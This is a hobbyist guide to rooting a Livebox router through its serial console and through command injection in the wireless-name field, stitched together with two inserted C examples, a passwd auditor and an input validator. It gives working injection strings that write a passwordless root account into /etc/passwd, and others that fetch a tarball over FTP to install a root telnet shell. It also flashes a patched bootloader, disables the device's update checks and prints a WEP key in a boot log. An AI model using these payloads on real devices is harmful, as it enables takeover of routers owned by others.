There are two methods of breaking into your Livebox.
Both methods exploit a bug in a specific version of the Livebox firmware.
If your firmware version is not 5.04-uk, you first need to downgrade to this release, which still has the webserver exploit.
This cable terminates in an MMJ connector at one end and has a female DB9 RS232 connector at the other. All ready to go - no external power supply needed. Just plug in, set your terminal emulator program to 115200 baud, 8 data bits, 1 stop bit, and you are connected to the Busybox serial console. Supplied as three parts.
We don't provide a case for the PCB - this is left as an exercise for the reader (some, less fussy, readers simply wrap the entire PCB with insulating tape). Be sure not to allow the PCB to touch metal objects - 5VDC is present on the PCB.
Making an RS232 adaptor. Crimped an RJ11 6P6C plug onto a piece of Cat5 cable and repurposed a PCB with a MAX232 on board to do the hookup. N.B. The chip needed for this converter is the MAX3232, which works at 3.3V (it costs rather more than a MAX232; we tried a MAX232 and it doesn't work). Turns out that the serial port socket on the Livebox isn't a 'standard' RJ11 connector - it is an MMJ connector with the retaining clip offset from the centre of the socket, so a standard RJ11 plug needs its clip cut off before it will enter. This gives 'reduced' insertion force, but there is a slight resistance - just enough to keep the connector in place.
On the PCB, there are solder pads for an RJ11 style socket - but no socket is populated on the board. It was hoped that this might expose a second serial port, but this is not the case.
When connected at 115200 baud, no parity, 8 data bits, 1 stop bit, we are presented with a login prompt. w00t! But we are asked for a root password. Doh!
So getting in is now going to be much easier. Just change the Livebox Name (in the browser UI, menu Configuration→Advanced→Wireless) to each of the following in sequence. This works with UK firmware 5.04.3. We only have 32 characters to play with in the wireless name, so each string must be entered exactly as shown:

    ;echo root::0:0:::/bin/sh>/tmp/x
    ;cp /tmp/x /etc/passwd
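Seen from the other side, the record those two strings write (root::0:0:::/bin/sh) is a root account with an empty password field, which is exactly the kind of thing a device audit should look for. The following C program is an added example, not code from this page or from the HAH project: it parses passwd-format records from a constructed sample buffer and flags any account with an empty password field, and any UID 0 account under a name other than root.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not from the Livebox firmware or the HAH project):
 * audit passwd-format records for the two conditions the injection
 * above produces. The sample buffer at the bottom is constructed. */

#define MAX_FIELDS 7

typedef struct {
    char name[64];
    int empty_password;   /* second field empty: login needs no password */
    int root_alias;       /* UID 0 under a name other than "root" */
} finding_t;

/* Split one NUL-terminated passwd line "name:pw:uid:gid:gecos:home:shell"
 * into its 7 fields in place. Returns 0 on success, -1 on malformed input. */
static int parse_passwd_line(char *line, char *fields[MAX_FIELDS]) {
    int n = 0;
    fields[n++] = line;
    for (char *p = line; *p != '\0'; p++) {
        if (*p == ':') {
            if (n == MAX_FIELDS) return -1;   /* too many fields */
            *p = '\0';
            fields[n++] = p + 1;
        }
    }
    return n == MAX_FIELDS ? 0 : -1;
}

/* Audit a passwd-format buffer. Works on a private copy so the caller's
 * string is untouched. Returns the number of suspicious accounts written
 * to out (at most max_out). */
int audit_passwd(const char *buf, finding_t *out, int max_out) {
    char copy[4096];
    int count = 0;
    size_t len = strlen(buf);
    if (len >= sizeof copy) len = sizeof copy - 1;
    memcpy(copy, buf, len);
    copy[len] = '\0';

    char *line = copy;
    while (line && *line) {
        char *nl = strchr(line, '\n');
        if (nl) *nl = '\0';
        char *f[MAX_FIELDS];
        if (parse_passwd_line(line, f) == 0) {
            int empty = (f[1][0] == '\0');
            int alias = (strcmp(f[2], "0") == 0 && strcmp(f[0], "root") != 0);
            if ((empty || alias) && count < max_out) {
                snprintf(out[count].name, sizeof out[count].name, "%s", f[0]);
                out[count].empty_password = empty;
                out[count].root_alias = alias;
                count++;
            }
        }
        line = nl ? nl + 1 : NULL;
    }
    return count;
}

/* Constructed sample: two ordinary records, then the record the
 * injection writes, then an extra UID 0 alias. */
const char *SAMPLE_PASSWD =
    "root:x:0:0:root:/root:/bin/sh\n"
    "nobody:x:99:99:nobody:/:/bin/false\n"
    "root::0:0:::/bin/sh\n"
    "admin2:x:0:0:::/bin/sh\n";

int main(void) {
    finding_t f[8];
    int n = audit_passwd(SAMPLE_PASSWD, f, 8);
    for (int i = 0; i < n; i++)
        printf("%s: %s%s\n", f[i].name,
               f[i].empty_password ? "empty password " : "",
               f[i].root_alias ? "UID 0 alias" : "");
    return 0;
}
```

On the sample buffer the audit reports two accounts: root (empty password) and admin2 (UID 0 alias); the legitimate root record with a real password field is not flagged.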
Fire up your trusty serial console program: putty, teraterm, hyperterm or whatever.
I now have an etc.tar that lives on my FTP server, so once I'm in I just do the following:

    Please press Enter to activate this console.

    WANADOO-ECD0 login: root
    No directory, logging in with HOME=/

    BusyBox v0.60.4 (2003) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    # cd /etc
    # wget ftp://192.168.1.12/etc.tar
    # tar xvf etc.tar
    utelnetd
    init.d/telnetd
    rc2.d/S35telnet
    rc1.d/S35telnet
    # /etc/init.d/telnetd start
    telnetd: starting
            port: 23;
            login program: /bin/sh
    #
Of course once I'm in via the serial port I don't need to even bother with setting up a TELNETD server I could just cut straight to the chase and fetch the new RedBoot loader and flash it.
    # cd /tmp
    # wget ftp://192.168.1.12/redboot_blueg5.6-patched
    # fcp -v redboot_blueg5.6-patched /dev/mtd0
There are a number of sites that give instructions on hacking in. This is a slightly modified version of what you'll normally find.
Connect an Ethernet patch cable to the yellow port on the Livebox & browse to
The next part of the process uses a 'backdoor' in the Livebox web server settings. It works in conjunction with an ftp server running on the PC that is connected to the Livebox. Since the Livebox runs Busybox, the 'wget' command is available to pull files onto the Livebox via ftp. So set up an ftp server on your PC (we used FileZilla Server on Windoze) and enable 'anonymous' access. If this is the first time that you have configured an ftp server, you will need to read and understand the user guide for your ftp server before proceeding. Also note that if you are running Vista, you will want to run the ftp server as the 'admin' user.
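The flaw this 'backdoor' relies on is a configuration field (the wireless name) being spliced verbatim into a shell command line, so a ';' in the field ends the intended command and the shell runs whatever follows it as root. The C program below is an added example, not code from the Livebox firmware or the HAH project; the command template and the helper path /bin/set_ssid are assumptions for illustration. It shows the vulnerable string-building pattern beside a hardened version that allow-lists the characters a wireless name legitimately needs, enforces the 32-character limit the page mentions, and passes the value to the helper as a separate argv element instead of through a shell.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example (not from the Livebox firmware or the HAH project). */

#define SSID_MAX 32   /* the 32-character limit mentioned on the page */

/* Vulnerable pattern. Builds the command string only and never executes
 * it, so the effect of a crafted name can be inspected. The template
 * "set_ssid %s" is an assumption; a real firmware would hand the result
 * to system(), where ';' splits it into several commands. */
int build_command_unsafe(const char *name, char *out, size_t outsz) {
    return snprintf(out, outsz, "set_ssid %s", name);
}

/* Hardened check: allow-list the characters a wireless name legitimately
 * needs and enforce the length limit.
 *   0  acceptable
 *  -1  empty or longer than SSID_MAX
 *  -2  character outside the allow-list (shell metacharacter, control byte) */
int validate_wireless_name(const char *name) {
    size_t len = strlen(name);
    if (len == 0 || len > SSID_MAX) return -1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (isalnum(c) || c == ' ' || c == '-' || c == '_' || c == '.') continue;
        return -2;
    }
    return 0;
}

/* Even a validated value should not pass through a shell: hand it to the
 * helper as its own argv element, ready for execv(). Returns 0 on success,
 * -1 if the name fails validation. */
int build_argv_safe(const char *name, const char *argv[4]) {
    if (validate_wireless_name(name) != 0) return -1;
    argv[0] = "/bin/set_ssid";   /* hypothetical helper path */
    argv[1] = "--name";
    argv[2] = name;              /* passed as data, never re-parsed by a shell */
    argv[3] = NULL;
    return 0;
}

/* Count the ';' separators in a built command line: anything above zero
 * means a shell would see additional commands after the intended one. */
int count_extra_commands(const char *cmdline) {
    int n = 0;
    for (const char *p = cmdline; *p; p++)
        if (*p == ';') n++;
    return n;
}

int main(void) {
    const char *inputs[] = {
        "WANADOO-0F02",                   /* a normal name (constructed) */
        ";cd /etc;wget ftp://10.0.0.2/u"  /* the payload used on this page */
    };
    char cmd[256];
    const char *argv[4];
    for (int i = 0; i < 2; i++) {
        build_command_unsafe(inputs[i], cmd, sizeof cmd);
        printf("unsafe command: %s  (extra commands: %d)\n",
               cmd, count_extra_commands(cmd));
        printf("validate: %d, argv build: %d\n",
               validate_wireless_name(inputs[i]), build_argv_safe(inputs[i], argv));
    }
    return 0;
}
```

The allow-list is deliberately narrow; a product would extend it to whatever characters the SSID really needs to carry, but never to shell metacharacters, and would still avoid a shell entirely by using execv() with the argv array.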
1. On the Livebox browser UI, in 'Configuration→Advanced→Network', change the LAN IP address to be 10.0.0.1
4. Download etc.tar into the FTP area on your PC and rename this file as u. We do this because we only have a limited number of characters available to us in the field we are using for the backdoor hack.
For info, here is what the tarfile contains:
    $ tar tvf etc.tar
    -rwxrwxrwx root/root     18304 1970-01-01 01:00 utelnetd
    -rwxr-xr-x root/root       145 1970-01-01 01:06 init.d/telnetd
    lrwxrwxrwx root/root         0 1970-01-01 01:02 rc2.d/S35telnet -> ../init.d/telnetd
    lrwxrwxrwx root/root         0 1970-01-01 01:02 rc1.d/S35telnet -> ../init.d/telnetd
5. In Configuration→Advanced→Wireless, change Livebox Name to
    ;cd /etc;wget ftp://10.0.0.2/u
and select Submit and then Apply the configuration.
Check your FTP logs (on the PC).
On FileZilla, this looked like:

    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> Connected, sending welcome message...
    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220-FileZilla Server version 0.9.34 beta
    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220-written by Tim Kosse (Tim.Kosse@gmx.de)
    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 220 Please visit http://sourceforge.net/projects/filezilla/
    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> USER anonymous
    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> 331 Password required for anonymous
    (000001) 21/05/2010 11:11:41 - (not logged in) (10.0.0.1)> PASS ******
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 230 Logged on
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> SYST
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 215 UNIX emulated by FileZilla
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> PWD
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 257 "/" is current directory.
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> TYPE I
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 200 Type set to I
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> PORT 10,0,0,1,12,1
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 200 Port command successful
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> RETR u
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 150 Opening data channel for file transfer.
    (000001) 21/05/2010 11:11:41 - anonymous (10.0.0.1)> 226 Transfer OK
    (000001) 21/05/2010 11:11:42 - anonymous (10.0.0.1)> disconnected.
6. Now, in 'Configuration→Advanced→Wireless', change the Livebox Name to
    ;cd /etc; tar xf u
and select Submit and then Apply the configuration. The Livebox will now reboot.
This will install the telnetd binary and its startup scripts. However, those scripts only run at system startup, so you need to change your Livebox name one more time (to something meaningful) to cause another reboot.
This will now start the Telnet server and you should be able to connect and login to the Livebox by typing 'telnet 10.0.0.1' at a command prompt on the PC.
You should see something like this:

    BusyBox v0.60.4 (2003) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    # ls
    Image          etc_ro_fs      linuxrc        sbin           webs
    bin            flasher        mnt            tmp
    dev            home           proc           tmp_ro_fs
    dev_update.sh  home_ro_fs     root           usr
    etc            lib            root_ro_fs     var
    #
If you find that you cannot access the Livebox via telnet, try unplugging/re-plugging power to the unit at this stage. Then re-try the telnet connection.
At this point, if you are working towards loading the HAH firmware, just skip to here to find out how to replace the RedBoot loader.
Alternatively, if you want to play about with the Busybox unix environment, carry out step 7.
7. Stopping 'phone home' behaviour. To prevent the Livebox finding its way out to autoupdate, do the following. Look in /etc - you should see the files 'autoconf.conf' and 'firm.conf'. Note that autoconf.conf is a symbolic link into a read-only part of the filesystem, so we need to replace it with an editable file:

    # cp autoconf.conf autoconf.conf1
    #
    # ls -la aut*
    lrwxrwxrwx    1 0        0              24 Jan  1 00:00 autoconf.conf -> /etc_ro_fs/autoconf.conf
    -rw-r--r--    1 0        0            2718 Jan  1 00:41 autoconf.conf1
    #
    # rm autoconf.conf
    #
    # mv autoconf.conf1 autoconf.conf
    #
Then use vi to edit 'autoconf.conf'. Change the following two lines
Do the same fix to 'firm.conf' - it is a regular file, not a symlink, so you don't need to recreate it.
This should stop all autoupdates.
Having connected a terminal to the Livebox serial port, we can see the output that is generated whilst the unit boots up.
    @AABCBCCCC9655432SDRAM16bitX10120123456+78ESA: 00:07:3a:f9:0f:02
    WEP KEY : E34E08C16FEAF50B985959B74B
    Ethernet eth0: MAC address 00:07:3a:f9:0f:02
    IP: 10.7.58.112, Default server: 0.0.0.0
    Hardware version 0x0A BLUE5G.6 WITHOUT OPTION
    Factory Settings Recovery Switch OFF
    RedBoot(tm) bootstrap and debug environment [ROM]
    Non-certified release, version release-wanadoo-fr - built 17:05:34, Aug  2 2005

    Platform: Blue_5g (MIPS32 4Kc)
    Copyright (C) 2000, 2001, 2002, Red Hat, Inc.

    RAM: 0x80000000-0x81000000, [0x80434720-0x80fe2000] available
    FLASH: 0xbe400000 - 0xbec00000, 128 blocks of 0x00010000 bytes each.
    == Executing boot script in 0.200 seconds - enter ^C twice to abort
    RedBoot> fis load -b 0x80010000 -m cramfs -f Image user_fs
    Looking for Image in cramfs user_fs partition
    cramfs_load : b 0x80010000, c 0xBE430000, s 0x00720000, f Image
    .............loaded 0x1900FC bytes
    RedBoot> exec -c "boot_loader=RedBoot root=1F01 mem=16M" 0x80010000
    Now booting linux kernel:
     Base address 0x8000fc00 Entry 0x80010000
     Cmdline : boot_loader=RedBoot root=1F01 mem=16M
    arcs_cmdline: boot_loader=RedBoot root=1F01 mem=16M
    Boot loader : REDBOOT
    prom init
    CPU revision is: 00029107
    Primary instruction cache 16kb, linesize 16 bytes (2 ways)
    Primary data cache 8kb, linesize 16 bytes (2 ways)
    Linux version 2.4.17 (bfo@bfo) (gcc version 3.2.2) #1 Tue Sep 20 16:56:45 CEST 2005
    Determined physical RAM map:
     memory: 00fa0000 @ 00000000 (usable)
    User-defined physical RAM map:
     memory: 00fa0000 @ 00000000 (usable)
    On node 0 totalpages: 4000
    zone(0): 4000 pages.
    zone(1): 0 pages.
    zone(2): 0 pages.
    Kernel command line: boot_loader=RedBoot root=1F01 mem=16M
    bcm_console_setup
    Calibrating delay loop... 254.77 BogoMIPS
    Memory: 13812k/16000k available (1429k kernel code, 2188k reserved, 96k data, 60k init, 0k highmem)
    Dentry-cache hash table entries: 2048 (order: 2, 16384 bytes)
    Inode-cache hash table entries: 1024 (order: 1, 8192 bytes)
    Mount-cache hash table entries: 512 (order: 0, 4096 bytes)
    Buffer-cache hash table entries: 1024 (order: 0, 4096 bytes)
    Page-cache hash table entries: 4096 (order: 2, 16384 bytes)
    Checking for 'wait' instruction... unavailable.
    POSIX conformance testing by UNIFIX
    mpi: No Card is in the PCMCIA slot
    PCI: Fixing up bus 0
    Linux NET4.0 for Linux 2.4
    Based upon Swansea University Computer Society NET3.039
    Initializing RT netlink socket
    Starting kswapd
    JFFS2 version 2.1. (C) 2001 Red Hat, Inc., designed by Axis Communications AB.
    pty: 256 Unix98 ptys configured
    brcmboard: brcm_board_init entry
    New led 8, mask : 0x00000001
    New led 0, mask : 0x00000002
    New led 9, mask : 0x00000004
    New led 6, mask : 0x00000008
    New led 1, mask : 0x00000010
    Module bcm63xx_cons.c v1.0 date: Sep 20 2005 time: 16:56:56 - FPERIPH:50000000
    block: 64 slots per queue, batch=16
    PPP generic driver version 2.4.1
    DBW flash: probing 16-bit flash bus
    Physically mapped flash: Probing for AMD compatible flash...
    mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002210, dev_id3 0x00002200
    Found AMD AM29BDS643D
    table[i] : mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002202, dev_id3 0x00002200, long_dev_id 1
    Found AMD AM29LV640MB
    table[i] : mfr_id 0x00000001, dev_id 0x0000227E, dev_id2 0x00002210, dev_id3 0x00002200, long_dev_id 1
    Found AMD AM29LV640MB
    Physically mapped flash: Found 1 x 8MiB AMD AM29LV640MB at 0x0
    mtd_info : type 3, size 0x00800000, erasesize 0x00010000, name Physically mapped flash, index 0, numeraseregions 3
    mtd_info->priv : amd_flash_private : device_type 2, interleave 1, numchips 1, chipshift 23
    <5>mymtd is : 80f52120
    Support for extended flash memory size : 0x00800000 ; ONLY 64MBIT SUPPORT
    RedBoot partition for 64MBit non aligned Flash
    RedBoot partition for 64MBit non aligned Flash
    RedBoot partition for 64MBit non aligned Flash
    RedBoot partition for 64MBit non aligned Flash
    RedBoot partition for 64MBit non aligned Flash
    Using RedBoot partition definition
    Creating 5 MTD partitions on "Physically mapped flash":
    0x00000000-0x00030000 : "RedBoot"
    0x00030000-0x00750000 : "user_fs"
    0x00750000-0x007f0000 : "jffs_system"
    0x007f0000-0x007ff000 : "FIS directory"
    0x007ff000-0x00800000 : "RedBoot config"
    usb.c: registered new driver usbdevfs
    usb.c: registered new driver hub
    NET4: Linux TCP/IP 1.0 for NET4.0
    IP Protocols: ICMP, UDP, TCP, IGMP
    IP: routing cache hash table of 512 buckets, 4Kbytes
    TCP: Hash tables configured (established 512 bind 1024)
    Linux IP multicast router 0.06 plus PIM-SM
    NET4: Unix domain sockets 1.0/SMP for Linux NET4.0.
    Ebtables v2.0 registered
    <6>NET4: Ethernet Bridge 008 for NET4.0
    VFS: Mounted root (cramfs filesystem) readonly.
    Freeing unused kernel memory: 60k freed
    init started:  BusyBox v0.60.4 (2003) multi-call binary
    Algorithmics/MIPS FPU Emulator v1.5
    SYSINIT INVENTEL version : v5.04.3-uk
    <SNIP>
    Sysinit done

    Please press Enter to activate this console.

    WANADOO-0F02 login: root

    BusyBox v0.60.4 (2003) Built-in shell (ash)
    Enter 'help' for a list of built-in commands.

    #
Now that you are in, to get your Livebox onto the local area network (assuming your network gateway is 192.168.11.1):

Adding a default route:

    # route add default gw 192.168.11.1 dev br0
Specifying a nameserver. Edit /etc/resolv.conf and add the line